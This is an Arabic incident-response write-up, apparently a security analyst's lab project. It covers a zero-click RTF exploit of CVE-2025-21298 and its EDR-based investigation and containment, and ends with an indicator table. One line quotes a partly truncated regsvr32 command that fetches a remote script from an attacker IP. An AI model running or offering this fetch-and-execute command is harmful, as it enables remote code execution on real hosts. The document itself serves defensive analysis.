
التحقيق التقني واحتواء المضيف لثغرة استغلال تنفيذ تعليمات برمجية عن بُعد (RCE) بدون نقرات ذات خطورة حرجة (CVE-2025-21298) باستخدام تليمترية (EDR) وتحليل ثابت للبرامج الضارة.
يوثق هذا المشروع التحقيق الشامل واحتواء محاولة تنفيذ تعليمات برمجية عن بُعد بدون نقرة (RCE) ذات خطورة حرجة. باستخدام تليمتريا من EDR واستخبارات التهديدات، حددت هجوم "العيش على الأرض" (LotL) الذي تجاوز الدفاعات الآلية وأنشأ اتصال القيادة والتحكم (C2).
حددت معرف الحدث 314: كشف ثغرة RCE بدون نقرة عبر OLE لنظام Windows. كشفت التليمتريا الأولية أن الملف الخبيث mail.rtf كان مسموحًا به من قبل دفاعات المحيط، مما يشير إلى اختراق نشط لمحطة العمل 'Austin'.

أجريت فحص سمعة لتجزئة الملف على VirusTotal. أكدت النتائج معدل كشف 25/55، حيث حددت الملف على أنه RTF مسلح يستخدم CVE-2025-21298. تسمح هذه الثغرة بتنفيذ تعليمات برمجية عن بُعد عبر جزء المعاينة في Windows دون تفاعل المستخدم.

انتقلت إلى تاريخ محطة EDR للمضيف 'Austin' لتحديد سلوك ما بعد الاستغلال. اكتشفت تنفيذًا ضارًا لـ "العيش على الأرض" (LotL):
regsvr32.exe /s /u /i:http://84.38.130.118/...regsvr32.exe) لجلب برنامج نصي صغير ضار من خادم بعيد، متجاوزًا القائمة البيضاء للتطبيقات القياسية وتوقيعات مكافحة الفيروسات التقليدية.

بعد إطار عمل الاستجابة للحوادث من NIST، تم إعطاء الأولوية للاحتواء الفوري. نفذت عزل الشبكة على المضيف المتأثر لإنهاء اتصال C2 ومنع الحركة الجانبية داخل شبكة الشركة.

تم إغلاق الحادث كـ إيجابي حقيقي. وثقت عنوان IP للمهاجم (84.38.130.118) والأدلة الجنائية لفريقي استخبارات التهديدات وجدار الحماية لمنع حدوثها في المستقبل.

| النوع | القيمة |
|---|
| عنوان IP لـ C2 | 84.38.130.118 |
| تجزئة الملف (SHA256) | df993d037cdb77a435d6993a37e7750dbbb16b2df64916499845b56aa9194184 |
| الثغرة | CVE-2025-21298 |
| MITRE ATT&CK | T1218.010 - Signed Binary Proxy Execution: Regsvr32 |